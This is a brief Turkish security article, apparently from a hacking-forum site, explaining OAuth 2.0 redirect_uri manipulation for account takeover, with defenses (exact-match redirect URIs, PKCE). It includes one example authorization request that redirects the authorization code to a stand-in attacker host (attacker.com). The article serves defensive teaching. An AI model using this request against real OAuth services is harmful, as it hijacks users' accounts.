Siber Alem / Detail / 206 / Oauth-2-0-openid-connect-entegrasyon-zafiyetleri-ve-hesap-ele-gecirme
technical_article_reader.sh
TECHNICAL PAPER / papers

OAuth 2.0 & OpenID Connect Entegrasyon Zafiyetleri ve Hesap Ele Geçirme

2026-07-21
1 min read (130 words)
12 views

Kimlik Doğrulama Analizi

OAuth 2.0 protokolu modern web ve mobil uygulamalarda üçüncü taraf kimlik doğrulaması sağlar. redirect_uri alanının esnek doğrulanması tam hesap ele geçirme (Account Takeover) açıklarına neden olur.

1. Redirect URI Manipülasyonu

Saldırgan yetkilendirme isteğindeki redirect_uri parametresini kendi kontrolündeki bir domaine yönlendirir. Kullanıcı giriş yaptığında onay kodu (authorization code) doğrudan saldırganın sunucusuna dökülür.

GET /oauth/authorize?client_id=123&redirect_uri=https://attacker.com/callback&resp HTTP/1.1
Host: auth.provider.com

2. Güvenlik Çözümleri

İstemci tarafında tam eşleşen (exact match) redirect_uri kayıtları zorunlu tutulmalı ve PKCE (Proof Key for Code Exchange) akışı tüm mobil ve web istemcilerinde aktif edilmelidir.

Makale Tartışmaları (1)

BlackH
USER
Rank: Script Kiddie
Posts: 9
Rep: 0
Joined: 2009-01
Rep Progress 0 / 500
2026-07-21 20:59:47 #1

💬 **Makale Tartışması**: OAuth 2.0 & OpenID Connect Entegrasyon Zafiyetleri ve Hesap Ele Geçirme çalışması hakkında sorularınızı ve saha tecrübelerinizi paylaşabilirsiniz.

Yorum Yapmak İçin Giriş Yapın

Bu makaleye yorum yazmak ve tartışmaya katılmak için giriş yapmalısınız.

Siber Alem V1 Status: Operational | Exploits: 448 (156 Verified)
Ping: 18ms Lang: EN